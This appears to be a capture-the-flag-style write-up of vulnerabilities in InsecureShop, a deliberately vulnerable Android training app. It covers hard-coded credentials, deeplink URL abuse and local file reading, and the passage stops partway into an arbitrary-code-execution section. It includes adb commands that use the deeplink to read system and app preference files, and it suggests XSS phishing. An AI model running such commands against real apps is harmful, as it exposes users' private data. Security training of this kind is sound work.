Table of Contents Summary
- Vulnerability 1---Hard coding of account and password information
- Vulnerability 2---Insufficient URL verification
- Vulnerability 3---Arbitrary code execution
- Vulnerability 4---Intent redirection (unauthorized access to protected components)
- Vulnerability 5 - Reading arbitrary files from local storage
Vulnerability 1—Account and password information are hard-coded
Decompile, view the source code, search for user
and view LoginActivity.class, and find that the password verification logic is in Util.
Click to view Util.class and find that the account name and password are hardcoded.
login successful
Vulnerability 2—Insufficient URL verification
The following WebViewActivity.class code in AndroidManifest.xml is as follows:
From this we can see that we can start the WebViewActivity through the following deeplink and load any url we specify.
insecureshop://com.insecureshop/web?url=https://www.baidu.com
insecureshop://com.insecureshop/webview?url=https://www.baidu.com?insecureshopapp.com
Method 1—Use adb to verify the vulnerability
adb shell am start -W -a xxx.action -d <deeplink>
# 参数解释
#- adb shell:即进入安卓shell环境
#- am:代表activity manager,即活动管理器
#- start:启动一个activity
#- -W 启动activity前,先等待设备唤醒,避免设备处于休眠状态启动activity时出错
#- -a 用于启动一个指定action的activity
#- -d 传递一个deeplink链接
Exploit 1—arbitrary url jump
adb shell am start -a android.intent.action.VIEW -d insecureshop://com.insecureshop/web?url=http://baidu.com
Exploit 2—Read local file
- Read application data directory
- Read application logs
- read sdcard
1. Read system files
/system/
/etc/hosts
/system/build.prop
adb shell am start -a android.intent.action.VIEW -d "insecureshop://com.insecureshop/web?url=file:///system/build.prop"
2. Read files related to the application data directory
adb shell am start -a android.intent.action.VIEW -d "insecureshop://com.insecureshop/web?url=file:///data/data/com.insecureshop/shared_prefs/Prefs.xml"
3. Read the sdcard file
sdcard/Download/magisk_install_log_2023-09-19T09.52.22.log
Method 2: Write js web page
Exploit 3—xss
Since the target is not enabled setJavaScriptCanOpenWindowsAutomatically(true)
, the pop-up window cannot pop up, but the js code can be executed.
You can use xss fishing, csrf, etc.
Vulnerability 3—Arbitrary code execution
1. Analyze the source code.
The target apk LoginActivity has the following code.
// 获取所有已安装应用程序的信息,将 List 转换为一个迭代器对象
paramView = getPackageManager(